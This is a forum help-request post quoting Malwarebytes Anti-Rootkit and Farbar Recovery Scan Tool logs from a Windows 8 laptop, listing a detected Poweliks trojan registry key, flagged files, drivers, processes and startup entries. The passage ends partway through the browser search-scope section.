windows powershell popup and sysWOW64\dllhost.exe blocked by Malwarebytes
<blockquote data-quote="stanm" data-source="post: 308296" data-attributes="member: 31324"><p>Malwarebytes Anti-Rootkit BETA 1.08.2.1001</p><p><a href="http://www.malwarebytes.org" target="_blank">www.malwarebytes.org</a></p><p></p><p>Database version: v2014.12.01.03</p><p></p><p>Windows 8 x64 NTFS</p><p>Internet Explorer 10.0.9200.16466</p><p>johnsmith :: JASONSTORM [administrator]</p><p></p><p>12/1/2014 7:59:02 AM</p><p>mbar-log-2014-12-01 (07-59-02).txt</p><p></p><p>Scan type: Quick scan</p><p>Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken</p><p>Scan options disabled: </p><p>Objects scanned: 337935</p><p>Time elapsed: 55 minute(s), 22 second(s)</p><p></p><p>Memory Processes Detected: 0</p><p>(No malicious items detected)</p><p></p><p>Memory Modules Detected: 0</p><p>(No malicious items detected)</p><p></p><p>Registry Keys Detected: 1</p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} (Trojan.Poweliks.B) -> Delete on reboot. [d1d60459d6a63cfaeba244be25db7987]</p><p></p><p>Registry Values Detected: 0</p><p>(No malicious items detected)</p><p></p><p>Registry Data Items Detected: 0</p><p>(No malicious items detected)</p><p></p><p>Folders Detected: 0</p><p>(No malicious items detected)</p><p></p><p>Files Detected: 3</p><p>C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe (TheftMarker.Crude) -> Delete on reboot. [ccdb7ae374083600e207281603ff0ef2]</p><p>C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak (TheftMarker.Crude) -> Delete on reboot. [bdea3627ee8e61d525c49f9fd032718f]</p><p>C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak.bak (TheftMarker.Crude) -> Delete on reboot. 
[f2b54914eb912f0744a54fefd42ee21e]</p><p></p><p>Physical Sectors Detected: 0</p><p>(No malicious items detected)</p><p></p><p>(end)</p><p></p><p></p><p></p><p>Malwarebytes Anti-Rootkit BETA 1.08.2.1001</p><p></p><p>(c) Malwarebytes Corporation 2011-2012</p><p></p><p>OS version: 6.2.9200 Windows 8 x64</p><p></p><p>Account is Administrative</p><p></p><p>Internet Explorer version: 10.0.9200.16466</p><p></p><p>File system is: NTFS</p><p>Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED</p><p>CPU speed: 2.494000 GHz</p><p>Memory total: 8467005440, free: 6794969088</p><p></p><p>---------------------------------------</p><p>Malwarebytes Anti-Rootkit BETA 1.08.2.1001</p><p></p><p>(c) Malwarebytes Corporation 2011-2012</p><p></p><p>OS version: 6.2.9200 Windows 8 x64</p><p></p><p>Account is Administrative</p><p></p><p>Internet Explorer version: 10.0.9200.16466</p><p></p><p>File system is: NTFS</p><p>Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED</p><p>CPU speed: 2.494000 GHz</p><p>Memory total: 8467005440, free: 6802513920</p><p></p><p>Downloaded database version: v2014.12.01.03</p><p>Downloaded database version: v2014.12.01.01</p><p>=======================================</p><p>Initializing...</p><p>This version of Malwarebytes Anti-Rootkit requires you to completely exit the Malwarebytes Anti-Malware application to continue.</p><p>Initializing...</p><p>======================</p><p>------------ Kernel report ------------</p><p> 12/01/2014 07:58:53</p><p>------------ Loaded modules 
-----------</p><p>\SystemRoot\system32\ntoskrnl.exe</p><p>\SystemRoot\system32\hal.dll</p><p>\SystemRoot\system32\kd.dll</p><p>\SystemRoot\system32\mcupdate_GenuineIntel.dll</p><p>\SystemRoot\System32\drivers\CLFS.SYS</p><p>\SystemRoot\System32\drivers\tm.sys</p><p>\SystemRoot\system32\PSHED.dll</p><p>\SystemRoot\system32\BOOTVID.dll</p><p>\SystemRoot\system32\CI.dll</p><p>\SystemRoot\System32\drivers\msrpc.sys</p><p>\SystemRoot\system32\drivers\Wdf01000.sys</p><p>\SystemRoot\system32\drivers\WDFLDR.SYS</p><p>\SystemRoot\System32\Drivers\acpiex.sys</p><p>\SystemRoot\System32\Drivers\WppRecorder.sys</p><p>\SystemRoot\System32\drivers\ACPI.sys</p><p>\SystemRoot\System32\drivers\WMILIB.SYS</p><p>\SystemRoot\System32\Drivers\cng.sys</p><p>\SystemRoot\System32\drivers\msisadrv.sys</p><p>\SystemRoot\System32\drivers\pci.sys</p><p>\SystemRoot\System32\drivers\vdrvroot.sys</p><p>\SystemRoot\system32\drivers\pdc.sys</p><p>\SystemRoot\System32\drivers\partmgr.sys</p><p>\SystemRoot\System32\drivers\spaceport.sys</p><p>\SystemRoot\System32\drivers\volmgr.sys</p><p>\SystemRoot\System32\drivers\volmgrx.sys</p><p>\SystemRoot\System32\drivers\mountmgr.sys</p><p>\SystemRoot\System32\drivers\iaStorA.sys</p><p>\SystemRoot\System32\drivers\storport.sys</p><p>\SystemRoot\System32\drivers\EhStorClass.sys</p><p>\SystemRoot\system32\drivers\fltmgr.sys</p><p>\SystemRoot\System32\drivers\fileinfo.sys</p><p>\SystemRoot\system32\drivers\WdFilter.sys</p><p>\SystemRoot\System32\Drivers\Ntfs.sys</p><p>\SystemRoot\System32\Drivers\ksecdd.sys</p><p>\SystemRoot\System32\drivers\pcw.sys</p><p>\SystemRoot\System32\Drivers\Fs_Rec.sys</p><p>\SystemRoot\system32\drivers\ndis.sys</p><p>\SystemRoot\system32\drivers\NETIO.SYS</p><p>\SystemRoot\System32\Drivers\ksecpkg.sys</p><p>\SystemRoot\System32\drivers\tcpip.sys</p><p>\SystemRoot\System32\drivers\fwpkclnt.sys</p><p>\SystemRoot\system32\DRIVERS\wfplwfs.sys</p><p>\SystemRoot\System32\DRIVERS\fvevol.sys</p><p>\SystemRoot\system32\DRIVERS\hpdskflt.sys</p><p
>\SystemRoot\System32\drivers\wd.sys</p><p>\SystemRoot\System32\drivers\volsnap.sys</p><p>\SystemRoot\System32\drivers\rdyboost.sys</p><p>\SystemRoot\System32\Drivers\mup.sys</p><p>\SystemRoot\System32\drivers\disk.sys</p><p>\SystemRoot\System32\drivers\CLASSPNP.SYS</p><p>\SystemRoot\System32\Drivers\crashdmp.sys</p><p>\SystemRoot\System32\drivers\cdrom.sys</p><p>\SystemRoot\System32\Drivers\Null.SYS</p><p>\SystemRoot\System32\Drivers\Beep.SYS</p><p>\SystemRoot\System32\drivers\BasicRender.sys</p><p>\SystemRoot\System32\drivers\dxgkrnl.sys</p><p>\SystemRoot\System32\drivers\watchdog.sys</p><p>\SystemRoot\System32\drivers\dxgmms1.sys</p><p>\SystemRoot\System32\drivers\BasicDisplay.sys</p><p>\SystemRoot\System32\Drivers\Npfs.SYS</p><p>\SystemRoot\System32\Drivers\Msfs.SYS</p><p>\SystemRoot\system32\DRIVERS\tdx.sys</p><p>\SystemRoot\system32\DRIVERS\TDI.SYS</p><p>\SystemRoot\System32\DRIVERS\netbt.sys</p><p>\SystemRoot\system32\drivers\afd.sys</p><p>\SystemRoot\system32\DRIVERS\pacer.sys</p><p>\SystemRoot\system32\DRIVERS\vwififlt.sys</p><p>\SystemRoot\system32\DRIVERS\netbios.sys</p><p>\SystemRoot\system32\DRIVERS\rdbss.sys</p><p>\SystemRoot\system32\DRIVERS\wanarp.sys</p><p>\SystemRoot\system32\drivers\nsiproxy.sys</p><p>\SystemRoot\System32\drivers\npsvctrig.sys</p><p>\SystemRoot\System32\drivers\mssmbios.sys</p><p>\SystemRoot\System32\drivers\discache.sys</p><p>\SystemRoot\System32\Drivers\dfsc.sys</p><p>\SystemRoot\system32\DRIVERS\CLVirtualDrive.sys</p><p>\SystemRoot\system32\DRIVERS\ndistapi.sys</p><p>\SystemRoot\system32\DRIVERS\ndiswan.sys</p><p>\SystemRoot\system32\DRIVERS\rassstp.sys</p><p>\SystemRoot\system32\DRIVERS\AgileVpn.sys</p><p>\SystemRoot\system32\DRIVERS\tunnel.sys</p><p>\SystemRoot\System32\drivers\CompositeBus.sys</p><p>\SystemRoot\system32\DRIVERS\kdnic.sys</p><p>\SystemRoot\System32\drivers\umbus.sys</p><p>\SystemRoot\system32\DRIVERS\igdkmd64.sys</p><p>\SystemRoot\System32\drivers\USBXHCI.SYS</p><p>\SystemRoot\System32\drivers\ucx01000.sys</p
><p>\SystemRoot\System32\drivers\HECIx64.sys</p><p>\SystemRoot\System32\drivers\usbehci.sys</p><p>\SystemRoot\System32\drivers\USBPORT.SYS</p><p>\SystemRoot\System32\drivers\HDAudBus.sys</p><p>\SystemRoot\system32\DRIVERS\RtsBaStor.sys</p><p>\SystemRoot\system32\DRIVERS\Rt630x64.sys</p><p>\SystemRoot\System32\drivers\i8042prt.sys</p><p>\SystemRoot\system32\DRIVERS\SynTP.sys</p><p>\SystemRoot\system32\DRIVERS\USBD.SYS</p><p>\SystemRoot\System32\drivers\kbdclass.sys</p><p>\SystemRoot\System32\drivers\mouclass.sys</p><p>\SystemRoot\System32\drivers\CmBatt.sys</p><p>\SystemRoot\System32\drivers\BATTC.SYS</p><p>\SystemRoot\system32\DRIVERS\Smb_driver_Intel.sys</p><p>\SystemRoot\system32\DRIVERS\Accelerometer.sys</p><p>\SystemRoot\System32\drivers\wmiacpi.sys</p><p>\SystemRoot\System32\drivers\WirelessButtonDriver64.sys</p><p>\SystemRoot\System32\drivers\HIDCLASS.SYS</p><p>\SystemRoot\System32\drivers\HIDPARSE.SYS</p><p>\SystemRoot\System32\drivers\intelppm.sys</p><p>\SystemRoot\system32\DRIVERS\raspptp.sys</p><p>\SystemRoot\system32\DRIVERS\rasl2tp.sys</p><p>\SystemRoot\system32\DRIVERS\raspppoe.sys</p><p>\SystemRoot\System32\drivers\swenum.sys</p><p>\SystemRoot\System32\drivers\ks.sys</p><p>\SystemRoot\System32\drivers\rdpbus.sys</p><p>\SystemRoot\System32\Drivers\NDProxy.SYS</p><p>\SystemRoot\System32\drivers\usbhub.sys</p><p>\SystemRoot\System32\drivers\UsbHub3.sys</p><p>\SystemRoot\system32\DRIVERS\stwrt64.sys</p><p>\SystemRoot\system32\DRIVERS\portcls.sys</p><p>\SystemRoot\system32\DRIVERS\drmk.sys</p><p>\SystemRoot\system32\drivers\ksthunk.sys</p><p>\SystemRoot\system32\DRIVERS\IntcDAud.sys</p><p>\SystemRoot\System32\drivers\hidusb.sys</p><p>\SystemRoot\System32\drivers\mouhid.sys</p><p>\SystemRoot\System32\drivers\usbccgp.sys</p><p>\SystemRoot\System32\Drivers\usbvideo.sys</p><p>\SystemRoot\System32\Drivers\fastfat.SYS</p><p>\SystemRoot\System32\Drivers\dump_diskdump.sys</p><p>\SystemRoot\System32\Drivers\dump_iaStorA.sys</p><p>\SystemRoot\System32\Drivers\dump_du
mpfve.sys</p><p>\SystemRoot\System32\win32k.sys</p><p>\SystemRoot\system32\DRIVERS\monitor.sys</p><p>\SystemRoot\System32\TSDDD.dll</p><p>\SystemRoot\System32\cdd.dll</p><p>\SystemRoot\System32\ATMFD.DLL</p><p>\SystemRoot\system32\drivers\luafv.sys</p><p>\SystemRoot\system32\drivers\WudfPf.sys</p><p>\SystemRoot\System32\drivers\WinUSB.sys</p><p>\SystemRoot\System32\drivers\WUDFRd.sys</p><p>\SystemRoot\system32\DRIVERS\lltdio.sys</p><p>\SystemRoot\system32\DRIVERS\nwifi.sys</p><p>\SystemRoot\system32\DRIVERS\ndisuio.sys</p><p>\SystemRoot\system32\DRIVERS\rspndr.sys</p><p>\SystemRoot\system32\drivers\HTTP.sys</p><p>\SystemRoot\system32\DRIVERS\bowser.sys</p><p>\SystemRoot\System32\drivers\mpsdrv.sys</p><p>\SystemRoot\system32\DRIVERS\mrxsmb.sys</p><p>\SystemRoot\system32\DRIVERS\mrxsmb10.sys</p><p>\SystemRoot\system32\DRIVERS\mrxsmb20.sys</p><p>\SystemRoot\system32\drivers\Ndu.sys</p><p>\SystemRoot\system32\drivers\peauth.sys</p><p>\SystemRoot\System32\Drivers\secdrv.SYS</p><p>\SystemRoot\System32\DRIVERS\srvnet.sys</p><p>\SystemRoot\System32\drivers\tcpipreg.sys</p><p>\SystemRoot\System32\DRIVERS\srv2.sys</p><p>\SystemRoot\System32\DRIVERS\srv.sys</p><p>\??\C:\Windows\system32\drivers\hitmanpro37.sys</p><p>\SystemRoot\system32\DRIVERS\cdfs.sys</p><p>\SystemRoot\System32\drivers\condrv.sys</p><p>\SystemRoot\system32\DRIVERS\netr28x.sys</p><p>\SystemRoot\System32\drivers\vwifibus.sys</p><p>\SystemRoot\system32\DRIVERS\vwifimp.sys</p><p>\??\C:\Windows\system32\drivers\mbamchameleon.sys</p><p>\??\C:\Windows\system32\drivers\MBAMSwissArmy.sys</p><p>----------- End -----------</p><p>Done!</p><p><<<1>>></p><p>Upper Device Name: \Device\Harddisk0\DR0</p><p>Upper Device Object: 0xfffffa80096d8060</p><p>Upper Device Driver Name: \Driver\disk\</p><p>Lower Device Name: \Device\00000047\</p><p>Lower Device Object: 0xfffffa8007d6f2b0</p><p>Lower Device Driver Name: \Driver\iaStorA\</p><p><<<2>>></p><p>Physical Sector Size: 512</p><p>Drive: 0, DevicePointer: 0xfffffa80096d8060, 
DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\</p><p>--------- Disk Stack ------</p><p>DevicePointer: 0xfffffa80096d8b10, DeviceName: Unknown, DriverName: \Driver\partmgr\</p><p>DevicePointer: 0xfffffa80096d8060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\</p><p>DevicePointer: 0xfffffa8008796b10, DeviceName: Unknown, DriverName: \Driver\hpdskflt\</p><p>DevicePointer: 0xfffffa8007d6f2b0, DeviceName: \Device\00000047\, DriverName: \Driver\iaStorA\</p><p>------------ End ----------</p><p>Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\</p><p>Upper DeviceData: 0x0, 0x0, 0x0</p><p>Lower DeviceData: 0x0, 0x0, 0x0</p><p><<<3>>></p><p>Volume: C:</p><p>File system type: NTFS</p><p>SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes</p><p><<<2>>></p><p><<<3>>></p><p>Volume: C:</p><p>File system type: NTFS</p><p>SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes</p><p>Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...</p><p>Done!</p><p>Drive 0</p><p>This is a System drive</p><p>Scanning MBR on drive 0...</p><p>Inspecting partition table:</p><p>This drive is a GPT Drive.</p><p>MBR Signature: 55AA</p><p>Disk Signature: 4463ED8</p><p></p><p>GPT Protective MBR Partition information:</p><p></p><p> Partition 0 type is EFI-GPT (0xee)</p><p> Partition is NOT ACTIVE.</p><p> Partition starts at LBA: 1 Numsec = 1465149167</p><p></p><p> Partition 1 type is Empty (0x0)</p><p> Partition is NOT ACTIVE.</p><p> Partition starts at LBA: 0 Numsec = 0</p><p></p><p> Partition 2 type is Empty (0x0)</p><p> Partition is NOT ACTIVE.</p><p> Partition starts at LBA: 0 Numsec = 0</p><p></p><p> Partition 3 type is Empty (0x0)</p><p> Partition is NOT ACTIVE.</p><p> Partition starts at LBA: 0 Numsec = 0</p><p></p><p>GPT Partition information:</p><p></p><p> GPT Header Signature 4546492050415254</p><p> GPT Header Revision 65536 Size 92 CRC 4060582503</p><p> GPT Header 
CurrentLba = 1 BackupLba 1465149167</p><p> GPT Header FirstUsableLba 34 LastUsableLba 1465149134</p><p> GPT Header Guid db36cdd8-6a1-4593-82f7-fe8be9635ce3</p><p> GPT Header Contains 128 partition entries starting at LBA 2</p><p> GPT Header Partition entry size = 128</p><p></p><p> Backup GPT header Signature 4546492050415254</p><p> Backup GPT header Revision 65536 Size 92 CRC 4060582503</p><p> Backup GPT header CurrentLba = 1465149167 BackupLba 1</p><p> Backup GPT header FirstUsableLba 34 LastUsableLba 1465149134</p><p> Backup GPT header Guid db36cdd8-6a1-4593-82f7-fe8be9635ce3</p><p> Backup GPT header Contains 128 partition entries starting at LBA 1465149135</p><p> Backup GPT header Partition entry size = 128</p><p></p><p> Partition 0 Type de94bba4-6d1-4d40-a16a-bfd5179d6ac</p><p> Partition ID cc93694e-549f-490e-b691-2744edbc3472</p><p> FirstLBA 2048 Last LBA 821247</p><p> Attributes 1</p><p> Partition Name Basic data partition</p><p></p><p> Partition 1 Type c12a7328-f81f-11d2-ba4b-0a0c93ec93b</p><p> Partition ID 59e6ba52-631b-42dd-856d-9d753560f97b</p><p> FirstLBA 821248 Last LBA 1353727</p><p> Attributes 0</p><p> Partition Name EFI system partition</p><p></p><p> GPT Partition 1 is bootable</p><p> Partition 2 Type e3c9e316-b5c-4db8-817d-f92df0215ae</p><p> Partition ID 9a4c6918-cf88-492b-84ee-b13ab7aa249f</p><p> FirstLBA 1353728 Last LBA 1615871</p><p> Attributes 0</p><p> Partition Name Microsoft reserved partition</p><p></p><p> Partition 3 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7</p><p> Partition ID 318bc6ab-44d7-469d-9893-cca19ba3d3a</p><p> FirstLBA 1615872 Last LBA 1409910783</p><p> Attributes 0</p><p> Partition Name Basic data partition</p><p></p><p> Partition 4 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7</p><p> Partition ID fafe7be9-88d0-424f-8a61-d41894123c</p><p> FirstLBA 1409910784 Last LBA 1465135103</p><p> Attributes 1</p><p> Partition Name Basic data partition</p><p></p><p>Disk Size: 750156374016 bytes</p><p>Sector size: 512 
bytes</p><p></p><p>Done!</p><p>Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe --> [TheftMarker.Crude]</p><p>Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak --> [TheftMarker.Crude]</p><p>Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak.bak --> [TheftMarker.Crude]</p><p>Infected: HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} --> [Trojan.Poweliks.B]</p><p>Scan finished</p><p>Creating System Restore point...</p><p>Cleaning up...</p><p>Removal scheduling successful. System shutdown needed.</p><p>System shutdown occurred</p><p>=======================================</p><p></p><p>Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 30-11-2014 01</p><p>Ran by johnsmith (administrator) on JASONSTORM on 01-12-2014 09:52:05</p><p>Running from C:\Users\johnsmith\Desktop\removal tools</p><p>Loaded Profile: johnsmith (Available profiles: johnsmith)</p><p>Platform: Windows 8 (X64) OS Language: English (United States)</p><p>Internet Explorer Version 10</p><p>Boot Mode: Normal</p><p>Tutorial for Farbar Recovery Scan Tool: <a href="http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/" target="_blank">http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/</a></p><p></p><p>==================== Processes (Whitelisted) =================</p><p></p><p>(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)</p><p></p><p>(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe</p><p>(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe</p><p>(IvoSoft) C:\Program Files\Classic Shell\ClassicShellService.exe</p><p>(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe</p><p>(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe</p><p>(Apple Inc.) 
C:\Program Files\Bonjour\mDNSResponder.exe</p><p>(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe</p><p>(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe</p><p>(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe</p><p>(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe</p><p>(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe</p><p>(Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe</p><p>() C:\Windows\System32\valWBFPolicyService.exe</p><p>(AuthenTec Inc.) C:\Program Files (x86)\HP SimplePass\TouchControl.exe</p><p>(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe</p><p>(IvoSoft) C:\Program Files\Classic Shell\ClassicStartMenu.exe</p><p>(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe</p><p>(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe</p><p>(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe</p><p>(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe</p><p>() C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe</p><p>(AuthenTec, Inc.) C:\Program Files\Common Files\AuthenTec\TrueService.exe</p><p>(AuthenTec, Inc.) C:\Program Files\Common Files\AuthenTec\TrueService.exe</p><p>(Intel Corporation) C:\Windows\System32\hkcmd.exe</p><p>(Intel Corporation) C:\Windows\System32\igfxpers.exe</p><p>(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe</p><p>(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe</p><p>(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe</p><p>(Hewlett-Packard Development Company, L.P.) 
C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe</p><p>(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe</p><p>(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe</p><p>(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe</p><p>(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe</p><p>(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p>(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe</p><p>(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\plugin-nm-server.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p></p><p></p><p>==================== Registry (Whitelisted) ==================</p><p></p><p>(If an entry is included in the fixlist, the registry item will be restored to default or removed. 
The file will not be moved.)</p><p></p><p>HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-07-21] (IDT, Inc.)</p><p>HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2916152 2012-08-24] (Synaptics Incorporated)</p><p>HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)</p><p>HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491320 2012-07-26] (CyberLink Corp.)</p><p>HKLM-x32\...\Run: [] => [X]</p><p>HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)</p><p>HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [580512 2012-07-31] (Hewlett-Packard Development Company, L.P.)</p><p>HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2011-08-26] (Hewlett-Packard Development Company, L.P.)</p><p>HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)</p><p>HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)</p><p>HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-18] (Adobe Systems Incorporated)</p><p>Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)</p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Run: [AdobeBridge] => [X]</p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Run: [FreeAC] => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe [1330008 2012-12-11] (Comfort Software Group)</p><p>ShellIconOverlayIdentifiers: 
[ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)</p><p>ShellIconOverlayIdentifiers-x32: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)</p><p></p><p>==================== Internet (Whitelisted) ====================</p><p></p><p>(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)</p><p></p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="https://www.google.com/" target="_blank">https://www.google.com/</a></p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = <a href="http://g.msn.com/HPNOT13/1" target="_blank">http://g.msn.com/HPNOT13/1</a></p><p>HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = <a href="http://g.msn.com/HPNOT13/1" target="_blank">http://g.msn.com/HPNOT13/1</a></p><p>HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="http://g.msn.com/HPNOT13/1" target="_blank">http://g.msn.com/HPNOT13/1</a></p><p>HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = <a href="http://g.msn.com/HPNOT13/1" target="_blank">http://g.msn.com/HPNOT13/1</a></p><p>HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = <a href="http://g.msn.com/HPNOT13/1" target="_blank">http://g.msn.com/HPNOT13/1</a></p><p>SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = <a href="http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS" target="_blank">http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS</a></p><p>SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = <a href="http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF" 
target="_blank">http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF</a></p><p>SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = <a href="http://rover.ebay.com/rover/1/711-154371-11896-2/4" target="_blank">http://rover.ebay.com/rover/1/711-154371-11896-2/4</a> ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}</p><p>SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = <a href="http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS" target="_blank">http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS</a></p><p>SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = <a href="http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF" target="_blank">http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF</a></p><p>SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = <a href="http://rover.ebay.com/rover/1/711-154371-11896-2/4" target="_blank">http://rover.ebay.com/rover/1/711-154371-11896-2/4</a> ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}</p><p>SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> DefaultScope {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = <a href="https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}" target="_blank">https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}</a></p><p>SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = <a href="http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS" 